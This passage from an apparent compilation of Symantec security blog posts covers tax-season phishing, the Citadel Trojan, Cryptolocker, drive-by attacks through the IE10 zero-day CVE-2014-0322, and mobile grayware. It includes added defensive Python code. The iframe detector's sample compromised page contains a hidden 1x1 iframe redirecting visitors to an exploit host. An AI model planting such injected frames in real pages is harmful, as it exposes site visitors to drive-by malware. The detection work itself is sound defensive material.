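        external = target.scheme in ("http", "https") and bool(target.netloc)
        sensitive = [f for f in form["fields"]
                     if f in SENSITIVE_FIELDS
                     or any(s in f for s in ("pass", "card", "cvv", "ssn"))]
        if external and sensitive:
            hits.append({"action": form["action"], "fields": sensitive})
    return hits


def scan_message(raw):
    """Return [(attachment filename, findings)] for each HTML attachment
    in a raw RFC 822 message that contains a suspicious form."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    results = []
    for part in msg.iter_attachments():
        fname = part.get_filename() or ""
        is_html = (part.get_content_type() == "text/html"
                   or fname.lower().endswith((".htm", ".html")))
        if not is_html:
            continue
        body = part.get_content()
        if isinstance(body, bytes):
            body = body.decode("utf-8", "replace")
        hits = suspicious_forms(body)
        if hits:
            results.append((fname, hits))
    return results


if __name__ == "__main__":
    for fname, hits in scan_message(SAMPLE_EML):
        for hit in hits:
            print(f"{fname}: form posts {hit['fields']} to {hit['action']}")
```

The same check can be run at the mail gateway over every inbound message with an HTML attachment; attachments that post to a bare IP address or to a host unrelated to the claimed sender deserve quarantine rather than a warning.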

 

 

We have also seen a variant of the well-known financial Trojan Zeus, known as Citadel, being used to steal financial credentials by leveraging trusted company names, such as TurboTax, to target victims:

[Screenshot: Citadel lure using the TurboTax name]

 

And while we haven’t yet seen ransomware threats such as Cryptolocker used in these campaigns, we strongly encourage small business owners and employees to be especially cautious when opening any email messages sent from an unknown or questionable source throughout the tax season. Once Cryptolocker runs on a system, important files on the device are encrypted, and only the cybercriminals hold the key to decrypt them. The data is then held for “ransom,” with the criminal demanding payment in a digital, hard-to-trace currency. Sadly, whether the ransom is paid or not, the victimized company rarely regains access to its files.

Much of the risk from these attacks and phishing scams can be avoided. To help prevent cybercriminals from attacking your small business this tax season, Symantec offers the following tips:

Quick tips to help you protect yourself and your business:

  • Make sure you have internet security software. Security software is the first line of defense you need between cybercriminals and the sensitive/financial data you keep on your computer, in your network, or in the cloud.  And traditional antivirus software is no longer enough. Shop security products.
  • Internet security software alone is not enough; you also need to back up your important data. Having a digital copy of your critical business information ensures that you can recover your critical data in the event of an attack or a system crash.  Shop backup and recovery products.
  • Utilize encryption for sensitive data. If you plan to use a wireless network to electronically file your taxes, be sure to use a secure Internet connection – never use public wireless hotspots. Shop encryption products.
  • Be suspicious! Scammers are quite good at making emails and links look legitimate, and the most lucrative tax return schemes are based on identity theft, so ensure your email is truly sent from the advertised source before opening it. Also, always be apprehensive about providing financial information, such as your Social Security Number (SSN), bank or credit card account numbers, or security-related information like your mother's maiden name, online—look for trust identifications like the Norton Secured Checkmark before submitting.
  • Require Password Protection. Password protect directories and accounts to ensure your data is defended from outside threats. Choose passwords with care—don't select a recognizable word, or something obvious, such as "password" or your name. Make your passwords as long and as complex as you can.
  • Always log out completely. Whether you're on a tax site, an online store, or any site in which you've entered personal information, remember one step: log out when you're done. If you don't, you're exposing identity information to cyber thieves. This is especially true if you're using a public computer or a shared work computer.
  • The IRS does not initiate contact by email. If you get an email claiming to be from the IRS or EFTPS (Electronic Federal Tax Payment System), don't respond; instead, forward it to phishing@irs.gov. The IRS also does not make unsolicited phone calls demanding payment. Email threats about consequences for failing to respond, or about blocking access to your funds, are fraudulent.
  • The postal system is not the safest way to receive checks from the IRS. Criminals look for unlocked mailboxes at tax time to steal tax return envelopes. Always have your refund directly deposited into your bank account to help ensure your money reaches you.

For more information on small business security products, visit: http://www.symantec.com/small-business and follow Symantec on Twitter, at @Symantec.

 

Internet Explorer 10 Zero-Day Vulnerability Now Also Being Exploited in Drive-By Download Attacks


In last week's blog post, we reported that a new zero-day vulnerability in Internet Explorer 10 was being exploited in a recent watering-hole attack. The vulnerability the attackers abused was the previously unknown Microsoft Internet Explorer Use-After-Free Remote Code Execution Vulnerability (CVE-2014-0322). As of last week, the attackers were targeting only specific users, delivering the zero-day exploit through a compromised website. Having continued to monitor attacks against CVE-2014-0322 closely, Symantec has since confirmed that exploitation of this vulnerability is no longer limited to APT (Advanced Persistent Threat) activity: the targets of the zero-day attack are expanding to ordinary Internet users. Symantec regards these attacks as drive-by downloads, which is hardly surprising. The exploit code is widely available, so anyone can obtain it and repurpose it for their own ends.

Symantec's telemetry shows a large increase in attempted zero-day attacks, rising dramatically since February 22 and targeting users in many countries and regions. The telemetry also shows a mix of targeted attacks and drive-by downloads.

Figure 1. Distribution of attacks exploiting CVE-2014-0322

Users visiting Japanese sites are particularly affected, mainly because several sites have been compromised and are being used to host drive-by downloads. The following sites were compromised in this attack:

  • A community site for mountain climbers
  • An adult dating site
  • A site promoting language education
  • A website providing financial market information
  • An online shopping site
  • The website of a Japanese travel agency

Judging from the components used in the attacks, most of them appear to be the work of the same attacker.

Figure 2. Regional distribution of computers targeted by the CVE-2014-0322 exploit

These websites were either modified to host the exploit for the Internet Explorer zero-day vulnerability or updated with an injected iframe that redirects to another compromised site hosting the exploit. When the exploit succeeds, it drops an online-banking Trojan that attempts to steal login credentials for Mizuho Bank and Japan Post Bank. Symantec detects this threat as Infostealer.Bankeiya.

Figure 3. Fake Mizuho Bank screen displayed by the Trojan (after login)

 

Figure 4. Fake Japan Post Bank screen displayed by the Trojan (after login)
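To illustrate the iframe injection described above (a compromised site updated with a hidden frame that pulls the exploit page from a third-party host), here is an added example; it is not code from Symantec or from the original post. It inspects a constructed copy of a compromised page (all hostnames and addresses are invented) and reports iframes that point off-site while also carrying a concealment signal: zero or 1x1 size, a hidden style, an enclosing hidden container, or a bare IP address as the source. An external frame on its own is not reported, because embedded maps and videos look exactly like that.

```python
"""Flag iframes injected into a compromised page to redirect visitors to an exploit host."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page standing in for a compromised site. The map embed is the
# site's own; the 1x1 frame inside the hidden div is the attacker's addition.
# All hostnames and addresses are invented for this example.
SAMPLE_PAGE_URL = "http://travel-agency.example/index.html"
SAMPLE_PAGE = """
<html><body>
<h1>Spring tours</h1>
<iframe src="http://maps.example/embed?loc=tokyo" width="600" height="400"></iframe>
<div style="display:none">
<iframe src="http://203.0.113.45/ie/index.html" width="1" height="1"
        style="visibility:hidden;position:absolute;left:-9999px"></iframe>
</div>
</body></html>
"""

HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|left\s*:\s*-\d{3,}", re.I)
BARE_IP = re.compile(r"^https?://\d{1,3}(?:\.\d{1,3}){3}(?:[:/]|$)", re.I)
VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
             "link", "meta", "param", "source", "track", "wbr"}


class IframeCollector(HTMLParser):
    """Collect every <iframe> together with whether an enclosing element hides it."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self._open = []  # stack of (tag, is_hidden) for elements still open

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            self.iframes.append({
                "attrs": a,
                "in_hidden_container": any(hidden for _, hidden in self._open),
            })
        if tag not in VOID_TAGS:
            self._open.append((tag, bool(HIDDEN_STYLE.search(a.get("style", "")))))

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; tolerates unclosed children.
        for i in range(len(self._open) - 1, -1, -1):
            if self._open[i][0] == tag:
                del self._open[i:]
                break


def _tiny(value):
    """True for a width/height of 0, 1 or 2 pixels, the usual injected-frame size."""
    try:
        return int(str(value).strip().lower().rstrip("px")) <= 2
    except ValueError:
        return False


def suspicious_iframes(page_url, html_text):
    """Return iframes that point off-site AND show at least one concealment signal."""
    page_host = urlparse(page_url).netloc.lower()
    collector = IframeCollector()
    collector.feed(html_text)
    hits = []
    for frame in collector.iframes:
        a = frame["attrs"]
        src = a.get("src", "")
        host = urlparse(src).netloc.lower()
        if not host or host == page_host:
            continue  # same-origin or relative frames are the site's own
        reasons = ["external src " + host]
        if _tiny(a.get("width")) and _tiny(a.get("height")):
            reasons.append("zero or 1x1 size")
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden style")
        if frame["in_hidden_container"]:
            reasons.append("inside hidden container")
        if BARE_IP.match(src):
            reasons.append("bare IP address")
        if len(reasons) > 1:  # external alone is not enough
            hits.append({"src": src, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in suspicious_iframes(SAMPLE_PAGE_URL, SAMPLE_PAGE):
        print(hit["src"], "->", ", ".join(hit["reasons"]))
```

Run this over a site's pages on a schedule and diff the result against a known-good baseline; the first appearance of an off-site, concealed frame is the moment the site became a drive-by host. Note that the check inspects markup only, so a frame assembled by obfuscated JavaScript at load time needs a rendered DOM (for example from a headless browser) rather than the raw HTML.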

 

Countermeasures against this attack

A security update that fixes this vulnerability has not yet been released, but Microsoft recommends the following measures to protect computers from attacks exploiting it:

We also recommend applying the relevant patches promptly once they are released. Customers using Symantec products are protected against this attack by the following detections:

Antivirus

Intrusion Prevention Signatures

Attacks exploiting this vulnerability are expected to keep increasing, so please take action immediately.

 

* To subscribe to the RSS feed for the Japanese-language Security Response blog, go to http://www.symantec.com/connect/ja/item-feeds/blog/2261/feed/all/ja.

Grayware: Casting a Shadow over the Mobile Software Marketplace

One of the most problematic areas in mobile security today is “grayware.” The dividing line between legitimate software and malware is not clearly drawn, and grayware occupies this murky middle ground. Grayware refers to applications that contain no recognizable malware but are nevertheless harmful or annoying to the user in some way. For example, an app might track the user’s location or Web browsing habits, or serve up unwanted ads. Grayware authors often maintain a veneer of legitimacy by outlining the application’s capabilities in the small print of the software license agreement. 
 
Grayware is not a new phenomenon and it first began to attract attention well over a decade ago when unwanted extras, such as spyware, were often packaged with free applications. As PC users became more savvy and aware of what they install, the controversy died down. However, the arrival of the new generation of smartphones has created a brand new software market. Consumers are prone to treat the mobile software market with the same degree of naivety that they may have treated the desktop space ten or fifteen years ago. Mobile apps are often installed with little or no consideration of what they may be capable of.
 
How big is the problem? Data collected by Symantec suggests that over a third of all mobile apps can be regarded as grayware. By the time the new version of Norton Mobile Security launched last year, Norton Mobile Insight, Symantec’s app analysis tool, had analyzed more than four million apps and found that 1.5 million could be classed as grayware. This compares to 300,000 apps that were classed as malware. 
 
Grayware can be anything from an app that plays fast and loose with the user’s privacy to something far more elaborate. For example, Symantec recently discovered a grayware app that encouraged Instagram users to share their usernames and passwords in order to increase likes and followers. The app, known as InstLike, was for a time available on the Apple App Store and the Google Play Store, but both companies have since removed it. 
 
The app claimed that it could provide people with followers and likes for free. However, it demanded a user’s login credentials for Instagram. The app was then given significant control of a user’s Instagram account, automatically liking photos without any user interaction.
 
One class of mobile grayware that has grown in recent years is what’s known as “madware.” This refers to apps that use aggressive ad libraries. An ad library is a component of an app that can collect information about the user for the purposes of displaying targeted advertising. It is a common feature of free apps, which usually rely on advertising for revenue. However, some ad libraries adopt aggressive tactics, such as leaking personal information, displaying ads in the notification bar, creating icons for ads or changing bookmarks. 
 
Recent research by Symantec found that of the 65 known ad libraries, over 50 percent can be classified as madware. The percentage of apps that utilize madware has risen steadily. For example, 23 percent of apps on the Google Play store last year can be considered as madware, up from less than 5 percent in 2010. 
 
What can be done about grayware? Because its behavior is disclosed somewhere in the license terms and does not cross into clearly malicious activity, antivirus products usually do not block it outright. Occasionally it is removed from official mobile marketplaces such as the Apple App Store or Google Play because it violates their terms and conditions. 
 
Knowledge is the best defense. In the same way that PC users are now a little bit more wary about what they install on their computers, smartphone users should take a moment to consider what they’re downloading and look into what permissions the app is seeking. 
 
There are also a number of tools you can use to help identify which apps may be taking liberties with your smartphone. For example, Norton Spot will scan your Android phone for aggressive ad libraries that may spam your device and identify the apps associated with them. 